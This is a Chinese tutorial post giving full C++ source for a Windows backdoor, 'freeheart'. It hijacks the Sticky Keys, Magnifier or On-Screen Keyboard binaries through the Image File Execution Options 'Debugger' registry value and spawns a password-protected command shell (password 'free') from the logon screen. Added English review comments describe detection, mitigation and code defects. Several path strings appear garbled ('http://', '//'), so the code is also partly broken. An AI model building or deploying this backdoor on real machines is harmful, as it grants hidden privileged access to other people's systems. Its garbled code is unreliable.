本文實例講述了C++映像劫持后門的方法。分享給大家供大家參考。具體如下:
// freeheart.cpp : Defines the entry point for the console application.
// For learning/exchange use only; the consequences of illegal use are the user's own responsibility.
// by:cnblogs.com/blogg time 2013.5.24
// argv 0 = freeheart.exe
// argv 1 = -i
// argv 2 = name.exe
// argv 3 = 1 2 3
// This program uses the Image File Execution Options ("image hijacking") technique:
// it creates a subkey named after the target program in the registry, adds a Debugger value
// under it, and points that value at its own program.
//[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options]
//
// Review notes (defensive reading of this listing):
//  * Persistence mechanism: a "Debugger" value under the IFEO key for an accessibility
//    binary (sethc.exe / magnify.exe / osk.exe). This is MITRE ATT&CK T1546.012
//    (Event Triggered Execution: Image File Execution Options Injection).
//  * Detection: any "Debugger" value under IFEO for these three binaries is a
//    high-confidence indicator; alert on registry value-set events for that key
//    (Sysmon Event ID 13, or Windows Security Event 4657 with a SACL on the key),
//    on unsigned executables newly written to the system directory, and on cmd.exe
//    spawned from the logon screen. The hard-coded prompt string "password:" and the
//    constant "free" below are trivially string-searchable in the binary.
//  * Mitigation: writing HKLM requires administrative rights, so least privilege and
//    tamper/ASR protection of the IFEO key contain this; periodically audit the key.
//  * Code-quality defects are annotated inline; the code itself is left unchanged.
#include "stdafx.h"
#include "windows.h"
#include "atlbase.h"
#include <iostream>
using namespace std;

// Entry point. Modes:
//   -i <name.exe> <1|2|3> : install (register Debugger for the chosen accessibility binary and copy self)
//   -u <1|2|3>            : uninstall (remove the file and the registry key)
//   any other argv[1]     : "debugger" invocation — prompt for the password, spawn cmd.exe on match
//   no arguments          : print the usage banner
int main(int argc, char* argv[])
{
    // Local prototypes of the helpers defined below.
    void anzhuang(char *Path,char *filename);
    void xiezai(char *path,char *hName);
    void CopyZiji(char *CopyPath);
    char *password = "free";        // the real password (plaintext constant embedded in the binary)
    char *shuruPwd = "";            // buffer for the entered password
                                    // DEFECT: points at a zero-length string literal; `cin>>shuruPwd`
                                    // below writes through it (undefined behaviour, no bounds).
    int errorbuff = 0;
    char *PathBuff = "";
    char *FileName = "";
    char *chsname = "sethc.exe";        // name of the Sticky Keys (Shift) program
    char *fangdajing = "magnify.exe";   // magnifier
    char *pingmujianpan = "osk.exe";    // on-screen keyboard
    LPTSTR sysbuff;                     // buffer receiving the system directory
    TCHAR tchBuffer2[1024];             // a character array
    sysbuff = tchBuffer2;               // point sysbuff at that array
    if(GetSystemDirectory(sysbuff, MAX_PATH))   // get the system directory
    {
        // Append a separator after the system directory, in place.
        // NOTE(review): the literal reads "http://" in this listing (likely a rendering
        // artifact of the original separator); as shown, the resulting path is not valid.
        sysbuff = strcat(sysbuff,"http://");
    }
    if (argv[1] != NULL)
    {
        // install command
        if (strcmp(argv[1],"-i") == 0)
        {
            if (argv[2] != NULL)
            {
                FileName=argv[2];
            }
            else
            {
                cout<<"請輸入文件名!";
                return 0;
            }
            if(argv[3] != NULL)
            {
                if(strcmp(argv[3],"1") == 0)
                {
                    anzhuang(FileName,chsname);
                    // sysbuff is modified in place by strcat; PathBuff aliases it.
                    PathBuff = strcat(sysbuff,FileName);
                    CopyZiji(PathBuff);
                    cout<<"創建完成! : "<<PathBuff<<endl;
                    return 0;
                }
                if(strcmp(argv[3],"2") == 0)
                {
                    anzhuang(FileName,fangdajing);
                    PathBuff = strcat(sysbuff,FileName);
                    CopyZiji(PathBuff);     // call the helper
                    cout<<"創建完成! : "<<PathBuff<<endl;
                    return 0;
                }
                if(strcmp(argv[3],"3") == 0)
                {
                    anzhuang(FileName,pingmujianpan);
                    PathBuff = strcat(sysbuff,FileName);
                    CopyZiji(PathBuff);     // call the helper
                    cout<<"創建完成! : "<<PathBuff<<endl;
                    return 0;
                }
            }
            else
            {
                cout<<"請輸入參數!"<<endl;
            }
            return 0;
        }
        // uninstall
        if (strcmp(argv[1],"-u") == 0)
        {
            if(argv[2] != NULL)
            {
                if(strcmp(argv[2],"1") == 0)
                {
                    xiezai(sysbuff,chsname);
                    cout<<"刪除文件成功!"<<endl;   // printed unconditionally; xiezai reports no result
                    return 0;
                }
                if(strcmp(argv[2],"2") == 0)
                {
                    xiezai(sysbuff,fangdajing);
                    cout<<"刪除文件成功!"<<endl;
                    return 0;
                }
                if(strcmp(argv[2],"3") == 0)
                {
                    xiezai(sysbuff,pingmujianpan);
                    cout<<"刪除文件成功!"<<endl;
                    return 0;
                }
            }
            else
            {
                cout<<"請輸入參數!"<<endl;
            }
            return 0;
        }
        // Why we reach here: "debugger a.exe" actually passes two parameters, so
        // if (argv[1] != NULL) — i.e. the second argument is non-empty — runs the statements below.
        while(errorbuff<3)      // allow three wrong attempts
        {
            cout<<"password:";
            cin>>shuruPwd;      // DEFECT: writes into a string literal (see declaration above)
            if (strcmp(shuruPwd,password) == 0)
            {
                system("cmd.exe");
                break;
            }
            else
            {
                cout<<"密碼錯誤!"<<endl;
            }
            errorbuff++;        // increment
        }
        return 0;
    }
    // No arguments: usage banner.
    system("color a");
    cout<<"-----------------------------------------------------"<<endl;
    cout<<"歡迎光臨自由的心,祝您好運!"<<endl;
    cout<<"1: sethc.exe Shift后門/n";
    cout<<"2: magnify.exe 放大鏡后門/n";
    cout<<"3: osk.exe 屏幕鍵盤后門/n";
    cout<<"-----------------------------------------------------"<<endl;
    cout<<"安裝: freeheart.exe -i xx.exe 1"<<endl;
    cout<<"卸載: freeheart.exe -u 1"<<endl;
    cout<<"連接密碼:free"<<endl;
    cout<<"-----------------------------------------------------"<<endl;
    return 0;
}

// install function
// Path:     value written to the "Debugger" entry (the file name passed as argv[2]).
// filename: name of the subkey to create under the IFEO key (the accessibility binary).
// Return values of RegCreateKeyEx/RegSetValueEx are not reported to the caller.
void anzhuang(char *Path,char *filename)
{
    HKEY hSoftKey = NULL;
    HKEY hCompanyKey = NULL;
    // NOTE(review): the key path here uses "//" separators as rendered; see note in main().
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SOFTWARE//Microsoft//Windows NT//CurrentVersion//Image File Execution Options"), 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS)
    {
        // NOTE(review): _T() is a literal-prefix macro; applied to a variable it presumably
        // only compiles in a non-Unicode build.
        if (RegCreateKeyEx(hSoftKey, _T(filename), 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_WRITE|KEY_READ, NULL,&hCompanyKey,NULL) == ERROR_SUCCESS)
        {
            LPBYTE Value=(LPBYTE)Path;
            // DEFECT: a fixed 50 bytes are written regardless of strlen(Path)+1 — reads past
            // the end of a shorter argument and truncates a longer one. ret1 is never checked.
            long ret1=::RegSetValueEx(hCompanyKey,"Debugger",0,REG_SZ,(BYTE*)Value,50);
            RegCloseKey(hCompanyKey);
        }
        RegCloseKey(hSoftKey);
    }
}

// uninstall function
// path:  system directory buffer (modified in place by strcat below).
// hName: the program name passed in (the accessibility binary whose subkey is removed).
void xiezai(char *path,char *hName)
{
    HKEY hSoftKey = NULL;
    LPCTSTR hMainKey="SOFTWARE//Microsoft//Windows NT//CurrentVersion//Image File Execution Options";
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, hMainKey, 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS)
    {
        DWORD len = 256;
        DWORD type = REG_SZ;
        LPBYTE last = new BYTE[256];    // DEFECT: never deleted (leak); and RegQueryValueEx does not
                                        // guarantee a NUL terminator before it is used as a C string.
        LPCTSTR hname = (LPCTSTR)hName;
        char *HHname;
        HKEY hKey;                      // DEFECT: uninitialised; RegCloseKey(hKey) below runs even
                                        // when the RegOpenKeyEx that would set it fails.
        // (stale comment copied from the install path) Create a subkey named magnify in the
        // registry, add a Debugger value under it, followed by this program's name.
        char* DelCom;
        // DEFECT: hMainKey points at a string literal; strcat writes into it (undefined behaviour).
        HHname=strcat((char *)hMainKey,"http://");      // hMainKey: registry path
        HHname=strcat((char *)hMainKey,(char *)hname);  // hname: program name
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)HHname,0,KEY_READ,&hKey)==ERROR_SUCCESS && RegQueryValueEx(hKey,"Debugger",0,&type,last,&len)==ERROR_SUCCESS)
        {
            DelCom=strcat(path,reinterpret_cast <char*>(last));
            DeleteFile(DelCom);             // delete the file (return value ignored)
            RegDeleteKey(hSoftKey,hname);   // delete the registry key (while hKey is still open)
        }
        RegCloseKey(hSoftKey);  // close handle
        RegCloseKey(hKey);      // close handle
    }
}

// Copy this executable to the given path.
// CopyPath: destination file path. CopyFile is called with bFailIfExists=true, so an
// existing destination is not overwritten; the result is not checked.
void CopyZiji(char *CopyPath)
{
    char PathBuff[MAX_PATH];    // buffer of MAX_PATH characters
    GetModuleFileName(NULL,PathBuff,MAX_PATH);  // NULL module = path of the current executable, stored in PathBuff
    CopyFile(PathBuff,CopyPath,true);           // PathBuff is this exe; copy it to the target path
}
希望本文所述對大家的C++程序設計有所幫助。